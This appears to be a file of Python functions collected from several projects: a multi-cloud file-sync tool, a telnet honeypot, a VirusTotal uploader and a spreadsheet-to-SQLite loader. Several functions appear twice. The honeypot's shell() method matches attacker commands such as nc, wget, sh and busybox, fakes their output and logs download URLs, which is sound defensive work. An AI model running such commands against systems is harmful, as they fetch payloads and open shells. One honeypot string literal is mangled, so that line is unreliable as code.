def test_blob_walk(metasync, opts): "test creating/walking a blob dir" opts.notree = True bs = blobs.BlobStore2(metasync) root = blobs.BlobDir2(bs) # generate sample tree for i in range(1, 3): parent_dir = blobs.BlobDir2(bs) root.add("dir-%s" % i, parent_dir) for j in range(1, 4): child_dir = blobs.BlobDir2(bs) parent_dir.add("sub-%s" % j, child_dir) for k in range(1, 5): blob_file = blobs.BlobFile2(bs) child_dir.add("file-%s" % k, blob_file) # count all entries cnt = 0 for (name, blob) in root.walk(): dbg.dbg("%-18s: %s" % (name, blob.hv)) cnt += 1 assert cnt == 2 * 3 * 4 + 2 * 3 + 2
def req(self, method, url, files=None, params=None, headers=None, retries=3): r = None if method == "GET": r = requests.get(url, files=files, params=params, headers=headers) elif method == "POST": r = requests.post(url, files=files, params=params, headers=headers) else: raise ValueError("Unknown Method: " + str(method)) if r.status_code == 204: if retries > 0: dbg("API Quota exceeded. Retrying in 61 seconds.") time.sleep(61) return self.req(method, url, files, params, headers, retries - 1) else: dbg("API Quota exceeded. Giving up.") return None else: return r
def __put_next(srv, hashdic, hashdic_left, allset, key, lock): dbg.job("submitted to: %s" % srv) while True: lock.acquire() if(len(hashdic[key]) == 0 or len(allset) == 0): lock.release() break next = hashdic[key].pop() if(next in allset): allset.remove(next) else: hashdic_left[key].append(next) next = None lock.release() if next is not None: with open(self.get_local_obj_path(next), "rb") as f: blob = f.read() for tr in self.translators: blob = tr.put(blob) # XXX HACK backoff = 0.5 remote_path = self.get_remote_obj_path(next) while not srv.put(remote_path, blob): dbg.dbg("backoff %s" % srv) time.sleep(backoff) backoff *= 2
def get_logs(self, path, last_clock): import portalocker import tailer import time pn = self.get_path(path) with open(pn, "r+") as log: while True: try: portalocker.lock(log, portalocker.LOCK_EX) break except: dbg.dbg("lock failed") time.sleep(0.1) curtime = int(util.current_sec()) lines = tailer.tail(log, 20) ret = [] if last_clock is None: last_clock = 0 for line in lines: sp = line.strip().split("\t") if(int(sp[0]) < last_clock): continue #log = { # 'time': eval(sp[0]), # 'message': sp[1] #} #ret.append(log) ret.append(sp[1]) return ret, curtime
def __put_next(srv, hashdic, hashdic_left, allset, key, lock): dbg.job("submitted to: %s" % srv) while True: lock.acquire() if (len(hashdic[key]) == 0 or len(allset) == 0): lock.release() break next = hashdic[key].pop() if (next in allset): allset.remove(next) else: hashdic_left[key].append(next) next = None lock.release() if next is not None: with open(self.get_local_obj_path(next), "rb") as f: blob = f.read() for tr in self.translators: blob = tr.put(blob) # XXX HACK backoff = 0.5 remote_path = self.get_remote_obj_path(next) while not srv.put(remote_path, blob): dbg.dbg("backoff %s" % srv) time.sleep(backoff) backoff *= 2
def loop(self): dbg("New Session") dbg("Setting timeout to " + str(self.timeout) + " seconds") self.sock.settimeout(self.timeout) self.test_opt(1) #self.test_naws() #if self.test_opt(1, True): # self.send_string("123\r\n") # sefl.recv_string() # self.test_opt(1, False) self.send_string( "Hello. Hint: Try any username/password\r\n\r\nLogin: "******"Password: "******"\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n") dbg("USER " + u) dbg("PASS " + p) while True: self.send_string(" # ") l = self.recv_line() dbg(" # " + l) self.text = self.text + " # " + l + "\r\n" self.shell(l)
def __get_next(srv, hash_dic, lock, allset, srvname): if(len(hash_dic[srvname]) == 0): return while True: lock.acquire() try: next = hash_dic[srvname].pop() l = len(hash_dic[srvname]) if(l%10 == 0): dbg.dbg("%s left %d" % (srvname, l)) if(next not in allset): allset.add(next) else: next = None except: lock.release() break lock.release() if(next is not None): remote_path = self.get_remote_obj_path(next) path = os.path.join(self.path_objs, next) with open(path, "wb") as f: backoff = 0.5 while True: blob = srv.get(remote_path) if(blob is not None): break dbg.dbg("back off %s" % srvname) time.sleep(backoff) backoff*=2 for tr in reversed(self.translators): blob = tr.get(blob) f.write(blob)
def test_blob_walk(metasync, opts): "test creating/walking a blob dir" opts.notree = True bs = blobs.BlobStore2(metasync) root = blobs.BlobDir2(bs) # generate sample tree for i in range(1, 3): parent_dir = blobs.BlobDir2(bs) root.add("dir-%s" % i, parent_dir) for j in range(1, 4): child_dir = blobs.BlobDir2(bs) parent_dir.add("sub-%s" % j, child_dir) for k in range(1, 5): blob_file = blobs.BlobFile2(bs) child_dir.add("file-%s" % k, blob_file) # count all entries cnt = 0 for (name, blob) in root.walk(): dbg.dbg("%-18s: %s" % (name, blob.hv)) cnt += 1 assert cnt == 2*3*4 + 2*3 + 2
def __init__(self, services, block, blockList): Thread.__init__(self) self.clientid = str(util.gen_uuid()) self.proposer = Proposer(self.clientid, services, block, blockList) self.latency = 0 self.master = False dbg.dbg("Client %s" % self.clientid)
def __get_next(srv, hash_dic, lock, allset, srvname): if (len(hash_dic[srvname]) == 0): return while True: lock.acquire() try: next = hash_dic[srvname].pop() l = len(hash_dic[srvname]) if (l % 10 == 0): dbg.dbg("%s left %d" % (srvname, l)) if (next not in allset): allset.add(next) else: next = None except: lock.release() break lock.release() if (next is not None): remote_path = self.get_remote_obj_path(next) path = os.path.join(self.path_objs, next) with open(path, "wb") as f: backoff = 0.5 while True: blob = srv.get(remote_path) if (blob is not None): break dbg.dbg("back off %s" % srvname) time.sleep(backoff) backoff *= 2 for tr in reversed(self.translators): blob = tr.get(blob) f.write(blob)
def get_logs(self, path, last_clock): import portalocker import tailer import time pn = self.get_path(path) with open(pn, "r+") as log: while True: try: portalocker.lock(log, portalocker.LOCK_EX) break except: dbg.dbg("lock failed") time.sleep(0.1) curtime = int(util.current_sec()) lines = tailer.tail(log, 20) ret = [] if last_clock is None: last_clock = 0 for line in lines: sp = line.strip().split("\t") if (int(sp[0]) < last_clock): continue #log = { # 'time': eval(sp[0]), # 'message': sp[1] #} #ret.append(log) ret.append(sp[1]) return ret, curtime
def update(self, path, content): """Update the file Args and returns same as put """ dbg.dbg(path) path = util.format_path(path) metadata = self._path_to_metadata(path) file_id = metadata['id'] uri = GoogleAPI.UPLOAD_URL + '/files/%s?uploadType=media' % file_id headers = { 'Content-Type': 'text/plain', 'Content-Length': len(content), } for retry_num in xrange(self._num_retries + 1): resp, data = self.service._http.request(uri, method='PUT', body=content, headers=headers) if resp.status < 500: break if resp.status >= 300: raise errors.HttpError(resp, data, uri=uri) if resp.status == 200: drive_file = json.loads(data) self._cache_metadata(path, drive_file) return True else: return False
def __init__(self, services, path): Thread.__init__(self) random.seed(time.time()) self.clientid = str(util.gen_uuid()) self.proposer = Proposer(self.clientid, services, path) self.latency = 0 self.master = False dbg.dbg("Client %s" % self.clientid)
def recv(self): byte = ord(self.sock.recv(1)) if byte in Telnetd.cmds: dbg("RECV " + str(Telnetd.cmds[byte])) else: pass #dbg("RECV " + str(byte)) return byte
def run(self): beg = time.time() val = self.proposer.propose(self.clientid).strip() end = time.time() self.latency = max(end - beg, self.latency) if val == self.clientid: self.master = True dbg.dbg("Proposal result: %s (%s)" % (val, self.latency))
def run(self): beg = time.time() val = self.proposer.propose2(self.clientid).strip() end = time.time() self.latency = max(end - beg, self.latency) if val == self.clientid: self.master = True dbg.dbg("Proposal result: %s (%s)" % (val, self.latency))
def __init__(self, output, remote_addr): dbg("New Session") self.output = output self.remote_addr = remote_addr # Files already commited self.files = []
def test_opt(self, opt, do=True): dbg("TEST " + str(opt)) self.send(Telnetd.IAC) if do: self.send(Telnetd.DO) else: self.send(Telnetd.DONT) self.send(opt)
def __init__(self, services, maxthreads=None): self.srv_threads = {} # XXX. inflexible in dealing with changes of services (list) if(maxthreads is None or cpu_count() > maxthreads): maxthreads = cpu_count() nthreads = maxthreads - len(services) for srv in services: self.srv_threads[srv] = ServiceThread(srv) # thredpool thread number? dbg.dbg("init scheduler: %s" % nthreads) self.pool = ThreadPool(min(nthreads, 3*len(services)))
def need(self, byte_need): byte = ord(self.sock.recv(1)) #if byte in Telnetd.cmds: # dbg("RECV " + str(Telnetd.cmds[byte])) #else: # dbg("RECV " + str(byte)) if byte != byte_need: dbg("BAD " + "PROTOCOL ERROR. EXIT.") raise ValueError() return byte
def __init__(self, services, maxthreads=None): self.srv_threads = {} # XXX. inflexible in dealing with changes of services (list) if (maxthreads is None or cpu_count() > maxthreads): maxthreads = cpu_count() nthreads = maxthreads - len(services) for srv in services: self.srv_threads[srv] = ServiceThread(srv) # thredpool thread number? dbg.dbg("init scheduler: %s" % nthreads) self.pool = ThreadPool(min(nthreads, 3 * len(services)))
def handle(self): try: conn, addr = self.sock.accept() dbg("Client connected at " + str(addr)) sess = TelnetSess(self, conn, addr) sess.loop() except: traceback.print_exc() conn.close() dbg("Client connection closed")
def run(self): self.sock.bind((self.host, self.port)) self.sock.listen(10) self.sock.settimeout(None) dbg("Socket open on " + str(self.host) + ":" + str(self.port)) while self.do_run: try: self.handle() except: traceback.print_exc() self.sock.close() dbg("Socket Closed")
def bstore_sync(self, hashnames): dbg.dbg("need to sync: %s..@%d" % (hashnames[0], len(hashnames))) def __put_next(srv, hashdic, hashdic_left, allset, key, lock): dbg.job("submitted to: %s" % srv) while True: lock.acquire() if (len(hashdic[key]) == 0 or len(allset) == 0): lock.release() break next = hashdic[key].pop() if (next in allset): allset.remove(next) else: hashdic_left[key].append(next) next = None lock.release() if next is not None: with open(self.get_local_obj_path(next), "rb") as f: blob = f.read() for tr in self.translators: blob = tr.put(blob) # XXX HACK backoff = 0.5 remote_path = self.get_remote_obj_path(next) while not srv.put(remote_path, blob): dbg.dbg("backoff %s" % srv) time.sleep(backoff) backoff *= 2 nthreads = self.options.nthreads if self.options is not None else 2 hashdic = {} hashdic_left = {} allset = set() lock = threading.Lock() for srv in self.srvmap: hashdic[srv] = [] hashdic_left[srv] = [] for hashname in hashnames: allset.add(hashname) for i in self.mapping.get_mapping(hashname): hashdic[i].append(hashname) for srv in hashdic: for i in range(nthreads): self.scheduler.submit(self.srvmap[srv], False, __put_next, hashdic, hashdic_left, allset, srv, lock) self._join() return hashdic_left
def run(self): self.sock.bind((self.host, self.port)) self.sock.listen(10) dbg("Socket open on port " + str(self.port)) while self.do_run: try: self.handle() except: traceback.print_exc() # ONLY HANDLE ONE CLIENT # self.stop() self.sock.close() dbg("Socket Closed")
def append(self, path, msg): import portalocker import time pn = self.get_path(path) with open(pn, "a+") as log: while True: try: portalocker.lock(log, portalocker.LOCK_EX) break except: dbg.dbg("lock failed") time.sleep(0.1) log.write("%d\t%s\n" % (util.current_sec(), msg))
def _path_to_metadata(self, path, isfolder=False): metadata = OneDriveMetaData.getInstance().path_to_metadata(path, isfolder) if not metadata: backoff = 0.5 while True: try: metadata = self.search(path) break except: dbg.dbg("onedrive, search backoff") time.sleep(backoff) backoff*=2 return metadata
def _path_to_metadata(self, path, isfolder=False): metadata = OneDriveMetaData.getInstance().path_to_metadata( path, isfolder) if not metadata: backoff = 0.5 while True: try: metadata = self.search(path) break except: dbg.dbg("onedrive, search backoff") time.sleep(backoff) backoff *= 2 return metadata
def rm(self, name): self._load() # remove only if we have such a file if name in self._entries: del self._entries[name] self._dirty = True self._sorted = None # if the one in dirties if name in self._dirties: del self._dirties[name] else: dbg.dbg("we don't have such a file")
def append(self, path, msg): import portalocker import time pn = self.get_path(path) util.mkdirs(os.path.dirname(pn)) with open(pn, "a+") as log: while True: try: portalocker.lock(log, portalocker.LOCK_EX) break except: dbg.dbg("lock failed") time.sleep(0.1) log.write("%d\t%s\n" % (util.current_sec(), msg))
def bstore_sync(self, hashnames): dbg.dbg("need to sync: %s..@%d" % (hashnames[0], len(hashnames))) def __put_next(srv, hashdic, hashdic_left, allset, key, lock): dbg.job("submitted to: %s" % srv) while True: lock.acquire() if(len(hashdic[key]) == 0 or len(allset) == 0): lock.release() break next = hashdic[key].pop() if(next in allset): allset.remove(next) else: hashdic_left[key].append(next) next = None lock.release() if next is not None: with open(self.get_local_obj_path(next), "rb") as f: blob = f.read() for tr in self.translators: blob = tr.put(blob) # XXX HACK backoff = 0.5 remote_path = self.get_remote_obj_path(next) while not srv.put(remote_path, blob): dbg.dbg("backoff %s" % srv) time.sleep(backoff) backoff *= 2 nthreads = self.options.nthreads if self.options is not None else 2 hashdic = {} hashdic_left = {} allset = set() lock = threading.Lock() for srv in self.srvmap: hashdic[srv] = [] hashdic_left[srv] = [] for hashname in hashnames: allset.add(hashname) for i in self.mapping.get_mapping(hashname): hashdic[i].append(hashname) for srv in hashdic: for i in range(nthreads): self.scheduler.submit(self.srvmap[srv], False, __put_next, hashdic, hashdic_left, allset, srv, lock) self._join() return hashdic_left
def _load(self): if not self.check_sanity(): return if (not os.path.exists(AUTH_DIR)): os.mkdir(AUTH_DIR) # load config self.config = util.load_config(self.path_conf) self.namespace = self.config.get("core", "namespace") self.clientid = self.config.get("core", "clientid") # load services from config self.srvmap = {} for tok in self.config.get("backend", "services").split(","): srv = services.factory(tok) self.srvmap[srv.sid()] = srv self.nreplicas = int(self.config.get("backend", "nreplicas")) nthreads = self.options.nthreads if self.options is not None else 2 self.scheduler = Scheduler(self.services, (nthreads + 1) * len(self.srvmap)) # load translator pipe if self.is_encypted(): self.translators.append(translators.TrEncrypt(self)) # TODO. for integrity option # if self.is_signed(): # self.translators.append(TrSigned(self)) beg = time.time() if (os.path.exists(self.get_path("mapping.pcl"))): with open(self.get_path("mapping.pcl")) as f: self.mapping = pickle.load(f) else: mapconfig = [] for srv in self.services: mapconfig.append((srv.sid(), srv.info_storage() / GB)) hspacesum = sum(map(lambda x: x[1], mapconfig)) hspace = max(hspacesum + 1, 1024) self.mapping = DetMap2(mapconfig, hspace=hspace, replica=self.nreplicas) self.mapping.pack() with open(self.get_path("mapping.pcl"), "w") as f: pickle.dump(self.mapping, f) end = time.time() dbg.time("mapping init %s" % (end - beg)) dbg.dbg("head: %s", self.get_head_name())
def vt_work(self): dbg("Virustotal uploader started") while True: f = self.vt_queue.get() if f == "!STOP!": self.vt_queue.task_done() dbg("Stopping worker") return scan = self.vt.query_hash_sha256(f["sha256"]) if scan: pass else: self.vt.upload_file(f["file"], f["name"]) self.vt_queue.task_done()
def load(f, sheet=None): dbg("loading spreadsheet...") if sheet is None: sheet = 0 x = xlrd.open_workbook(f) if type(sheet) == type('string'): sh = x.sheet_by_name(sheet) elif type(sheet) == type(1): sh = x.sheet_by_index(sheet) else: bail('bugger all, I dunno', err=2) dbg("spreadsheet loaded") return sh
def handle(self): conn = False try: conn, addr = self.sock.accept() # dbg("Client connected at " + str(addr) + " - [" + str(addr[0]) + "]") dbg("Client connected at [" + str(addr[0]) + "]") if self.ipfilter.is_allowed(addr[0]): self.ipfilter.add_ip(addr[0]) sess = TelnetSess(self, conn, addr) start_new_thread(sess.loop, ()) else: dbg("Connection limit for " + addr[0] + " exceeded, closing") conn.close() except: traceback.print_exc()
def shell(self, l): sh_regex = re.compile(".*sh\\s*(;|$)") nc_regex = re.compile(".*nc\\s*(;|$)") wget_regex = re.compile(".*wget\\s*(;|$)") dd_regex = re.compile(".*dd bs=52 count=1 if=.s.*") cat_regex = re.compile(".*cat .s.*cp /bin/echo .s.*") mount_regex = re.compile(".*cat /proc/mounts.*") elfcat_regex = re.compile(".*cat /bin/echo.*") token_regex = re.compile(".*/bin/busybox ([A-Z]+).*") downl_regex = re.compile(".*wget (?:-[a-zA-Z] )?(http[^ ;><&]*).*") if mount_regex.match(l): self.send_string( "/dev/root /rom squashfs ro,relatime 0 0\r\nproc /proc proc rw,nosuid,nodev,noexec,noatime 0 0\r\nsysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0\r\ntmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0\r\n/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0\r\noverlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0\r\ntmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0\r\ndevpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0\r\ndebugfs /sys/kernel/debug debugfs rw,noatime 0 0\r\n" ) if nc_regex.match(l): self.send_string( "BusyBox v1.24.2 () multi-call binary.\r\n\r\nUsage: nc [IPADDR PORT]\r\n\r\nOpen a pipe to IP:PORT\r\n" ) if sh_regex.match(l): self.send_string( "\r\n\r\nBusyBox v1.24.2 () built-in shell (ash)\r\n\r\n") if wget_regex.match(l): self.send_string("Usage: wget [options] <URL>\r\nOptions:\r\n") if dd_regex.match(l) or elfcat_regex.match(l): # Select random binary header, so we get multiple samples bin = ELF_BINS[random.randint(0, len(ELF_BINS) - 1)] self.send_string(bin) self.send_string("41+0 records in\r\n1+0 records out") if cat_regex.match(l): self.send_string("cat: can't open '.s': No such file or directory") m = token_regex.match(l) if m: token = m.group(1) self.send_string(token + ": applet not found\r\n") m = downl_regex.match(l) if m: url = m.group(1) dbg("DOWNLOAD URL " + url) self.serv.samples.put_url(url, self.db_id)
def _load(self): if not self.check_sanity(): return if(not os.path.exists(AUTH_DIR)): os.mkdir(AUTH_DIR) # load config self.config = util.load_config(self.path_conf) self.namespace = self.config.get("core", "namespace") self.clientid = self.config.get("core", "clientid") # load services from config self.srvmap = {} for tok in self.config.get("backend", "services").split(","): srv = services.factory(tok) self.srvmap[srv.sid()] = srv self.nreplicas = int(self.config.get("backend", "nreplicas")) nthreads = self.options.nthreads if self.options is not None else 2 self.scheduler = Scheduler(self.services, (nthreads+1)*len(self.srvmap)) # load translator pipe if self.is_encypted(): self.translators.append(translators.TrEncrypt(self)) # TODO. for integrity option # if self.is_signed(): # self.translators.append(TrSigned(self)) beg = time.time() if(os.path.exists(self.get_path("mapping.pcl"))): with open(self.get_path("mapping.pcl")) as f: self.mapping = pickle.load(f) else: mapconfig = [] for srv in self.services: mapconfig.append((srv.sid(), srv.info_storage()/GB)) hspacesum = sum(map(lambda x:x[1], mapconfig)) hspace = max(hspacesum+1, 1024) self.mapping = DetMap2(mapconfig, hspace=hspace, replica=self.nreplicas) self.mapping.pack() with open(self.get_path("mapping.pcl"), "w") as f: pickle.dump(self.mapping, f) end = time.time() dbg.time("mapping init %s" % (end-beg)) dbg.dbg("head: %s", self.get_head_name())
def test_blob(metasync, opts): "test blob-related operations" test_init(metasync, opts) bs = blobs.BlobStore2(metasync) blob_dir = blobs.BlobDir2(bs) # empty dir assert blob_dir.hv is not None \ and len(blob_dir.entries) == 0 # add three hv0 = blob_dir.hv blob_dir.add("dir1", blobs.BlobDir2(bs)) blob_dir.add("dir2", blobs.BlobDir2(bs)) blob_dir.add("dir3", blobs.BlobDir2(bs)) blob_dir.add("file", blobs.BlobFile2(bs)) hv3 = blob_dir.hv assert hv0 != hv3 \ and len(blob_dir.entries) == 4 for (name, blob) in blob_dir.entries.iteritems(): # empty dir if isinstance(blob, blobs.BlobDir2): assert blob.hv == hv0 # empty file if isinstance(blob, blobs.BlobFile2): assert blob.hv != hv0 # delete one blob_dir.rm("dir2") hv2 = blob_dir.hv assert hv3 != hv2 \ and len(blob_dir.entries) == 3 dbg.dbg("hv: %s\n%s" % (hv2, blob_dir.dump())) # test store/load blob_dir.store() # loaded from disk loaded_blob = blobs.BlobDir2(bs, hv2) assert loaded_blob.dump() == blob_dir.dump()
def restore_from_master(self): root = self.get_root_blob() dbg.dbg("restore") for name, blob in root.walk(): pn = os.path.join(self.path_root, name) if blob.thv == "F": content = blob.read() util.write_file(pn, content.getvalue()) content.close() if blob.thv == "m": content = blob.read() util.write_file(pn, content) elif blob.thv == "D" or blob.thv == "M": try: os.mkdir(pn) except: pass return True
def upload_file(self, f, fname): dbg("Uploading file " + f) fp = open(f, 'rb') params = {'apikey': self.api_key} files = {'file': (fname, fp)} headers = {"User-Agent": self.user_agent} res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers) json = res.json() fp.close() if json["response_code"] == 1: dbg("Uploading finished. See " + str(json["permalink"])) return json else: return None
def main(args): p = OptionParser() p.add_option("-d", "--dbfile", dest="dest", default="./myspreadsheet.db", help="destination file") p.add_option("-t", "--table", dest="table", default="main", help="name of table") p.add_option("-p", "--port", dest="port", default=2304, help="port") p.add_option("-o", "--origin", dest="origin", default="a,1", help="the origin (not yet implemented)") p.add_option("-x", "--origin-x", dest="xorigin", default="a", help="x origin") p.add_option("-y", "--origin-y", dest="yorigin", default="1", help="y origin") p.add_option("-s", "--sheet=", dest="sheet", default=0, help="sheet to load if not the first") p.add_option("-r", "--run-sqlite", dest="run", help="run sqlite upon load") p.add_option("-w", "--start-webserver", dest="web", help="start webserver upon load") # this is wrong, but I'm not sure what would be right p.add_option("-c", "--force-column-names", dest='force_colnames', action='store_true', default=False, help="don't even try to sniff column names") (options, args) = p.parse_args() dbg("options: %s; args: %s" % (options, args)) if len(args) != 1: bail("need exactly one non-flag argument") s = load(args[0]) cols = get_colnames(s, force_colnames=options.force_colnames) print("%s" % (cols,)) from sniffer import sniff_types defn = sniff_types(s, cols, fast=True) conn = setup_db(options.dest, defn, options.table) populate_db(conn, s, options.table, defn) dbg("database populated") if options.web: subprocess.getstatusoutput("python ./web.py")
def setup_db(dest, cols, table): import sqlite3 conn = sqlite3.connect(dest) ct0 = """CREATE TABLE %s (""" % (table,) ctX = ["%s %s" % (col[0], col[1]) for col in cols] ctN = """)""" ct = "%s %s %s" % (ct0, ", ".join(ctX), ctN) dbg(ct) c = conn.cursor() try: c.execute(ct) except sqlite3.OperationalError as oe: dbg("that was bad: %s" % (oe,)) bail("", err=2) c.close() return conn
def test_blob_load(metasync, opts): "test loading file/dir from a path" _init_disk_metasync(metasync, opts) bs = blobs.BlobStore2(metasync) # /a/b/c dirp = metasync.get_local_path("a", "b", "c") util.mkdirs(dirp) # /a/b/c/file pn = os.path.join(dirp, "file") util.create_random_file(pn, 5*KB) blob = bs.load_dir(dirp) blob.add("file", bs.load_file(pn)) # count how many blobs root = bs.get_root_blob() dbg.dbg("%-15s: %s" % ("/", root.hv)) cnt = 0 for (name, blob) in bs.walk(): dbg.dbg("%-15s: %s" % (name, blob.hv)) cnt += 1 assert cnt == len(["a", "b", "c", "file"]) # flush all new blobs assert len(os.listdir(metasync.path_objs)) == 0 root.store() assert len(os.listdir(metasync.path_objs)) == 6 # "." => root test_blob = bs.load_dir(metasync.get_local_path(".")) assert test_blob == root test_blob = bs.load_dir(metasync.get_local_path("")) assert test_blob == root
def populate_db(conn, sh, table, defn): c = conn.cursor() # first = 1 will change when we implement origin first = 1 # tmpl0_0 = """INSERT INTO %s (""" % (table,) tmpl0_0 = """INSERT INTO %s VALUES (""" % (table,) tmplA_slots = ", ".join(['?' for cell in sh.row(first)]) tmplA_vals = [] tmpl0_1 = """) VALUES (""" tmplB_slots = [] tmplB_vals = [] tmplN = """)""" print("%s" % (defn,)) tmpl = "%s %s %s" % (tmpl0_0, tmplA_slots, tmplN) dbg("tmpl: %s" % (tmpl,)) dbg("now working") for idx in range(first, sh.nrows): row = sh.row(idx) #tmplA_slots = "?" #tmplB_values = "?" vals = tuple([cell.value for cell in row]) conn.execute(tmpl, vals) #dbg("did something") if idx == 0: continue conn.commit()
def try_merge(self, head_history, master_history): # this need to be fixed. dbg.dbg("Trying to merge") # we may need to cache the last branched point common = self.get_common_ancestor(head_history, master_history) dbg.dbg("%s %s %s", head_history[0], master_history[0], common) common = self.blobstore.get_blob(common, "D") head = self.get_root_blob() master = self.blobstore.get_blob(master_history[0], "D") added1 = head.diff(common) added2 = master.diff(common) def intersect(a, b): return list(set(a) & set(b)) if(len(intersect(added1.keys(), added2.keys())) != 0): dbg.err("both modified--we need to handle it") return False for i in added2.keys(): path = os.path.join(self.path_root, i) dirblob = self.blobstore.load_dir(os.path.dirname(path), dirty=True) dirblob.add(os.path.basename(path), added2[i], dirty=False) # HACK, need to go through all the non-overlapped history. self.append_history(master.hv) head.store() self.append_history(head.hv) # HACK, need to be changed newblobs = self.blobstore.get_added_blobs() # push new blobs remotely self.bstore_sync(newblobs) self._join() return True
def bstore_download(self): # TODO, handle when R > 1 lst = self.blobstore.list() #dbg.dbg("lst files:%s" % lst) lock = threading.Lock() def __get_next(srv, hash_dic, lock, allset, srvname): if(len(hash_dic[srvname]) == 0): return while True: lock.acquire() try: next = hash_dic[srvname].pop() l = len(hash_dic[srvname]) if(l%10 == 0): dbg.dbg("%s left %d" % (srvname, l)) if(next not in allset): allset.add(next) else: next = None except: lock.release() break lock.release() if(next is not None): remote_path = self.get_remote_obj_path(next) path = os.path.join(self.path_objs, next) with open(path, "wb") as f: backoff = 0.5 while True: blob = srv.get(remote_path) if(blob is not None): break dbg.dbg("back off %s" % srvname) time.sleep(backoff) backoff*=2 for tr in reversed(self.translators): blob = tr.get(blob) f.write(blob) hash_dic = {} allset = set([]) for srv in self.services: hash_dic[str(srv)] = [] srvlist = srv.listdir(self.get_remote_obj_path()) backoff = 1 while srvlist is None: dbg.dbg("back off - listdir %s" % str(srv)) time.sleep(backoff) srvlist = srv.listdir(self.get_remote_obj_path()) for hashname in srvlist: if(hashname in lst): #dbg.dbg("%s is already in bstore" % hashname) continue hash_dic[str(srv)].append(hashname) nthreads = self.options.nthreads if self.options is not None else 2 for srv in self.services: dbg.dbg("%s:%d dn" % (str(srv), len(hash_dic[str(srv)]))) ##HACK for i in range(nthreads): self.scheduler.submit(srv, False, __get_next, hash_dic, lock, allset, str(srv))
def cmd_clone(self, namespace, backend=None, encrypt_key=None): # if wrong target if self.check_sanity(): return False # reset all the path by including the namespace self.path_root = os.path.join(self.path_root, namespace) self.path_meta = os.path.join(self.path_root, META_DIR) self.path_conf = self.get_path("config") self.path_objs = self.get_path("objects") #self.path_head_history = self.get_path("head_history") if os.path.exists(self.path_root): dbg.err("%s already exists." % self.path_root) return False if backend is None: print "input one of the storage backends, (e.g., dropbox,google,box)" print " for testing, use disk@/path (e.g., disk@/tmp)" backend = raw_input("> ") srv = services.factory(backend) self.namespace = namespace # create repo directory os.mkdir(self.path_root) os.mkdir(self.path_meta) os.mkdir(self.path_objs) curmaster = self.get_uptodate_master(False, srv) sp = curmaster.split(".") master = sp[0] seed = sp[1] seed = srv.get(self.get_remote_path("configs/%s" % seed)) conf = util.loads_config(seed) # setup client specific info conf.set('core', 'clientid' , util.gen_uuid()) conf.set('core', 'encryptkey', _get_conf_encryptkey(encrypt_key)) with open(self.path_conf, "w") as fd: conf.write(fd) self._load() beg = time.time() self.bstore_download() self._join() with open(self.get_head(), "w") as f: f.write(curmaster) with open(self.get_prev(), "w") as f: f.write(curmaster) # send my head to remote self._put_all(self.get_head(), self.get_remote_path(self.get_head_name())) self._put_all(self.get_prev(), self.get_remote_path(self.get_prev_name())) self._join() if (master): ret = self.restore_from_master() end = time.time() dbg.dbg("clone: %ss" % (end-beg)) return True
def on_moved(self, event): # XXX. not sure about its semantics, src/dst? # src_path => dest_path dbg.dbg(str(event)) self.lastupdate = time.time()
def _debug_time(self, msg): cur = time.time() # dbg.paxos_time("[%s] %s: %s" % (self.clientid, msg, cur-self.starttime)) dbg.dbg("[%s] %s: %s" % (self.clientid, msg, cur-self.starttime))
def update2(self): logs, new_clock = self.storage.get_logs2(self.path, self.clock) dbg.dbg('[%s] %s: %s' % (self.clientid, new_clock, logs)) for msg in logs: self._commit_msg(msg) self.clock = new_clock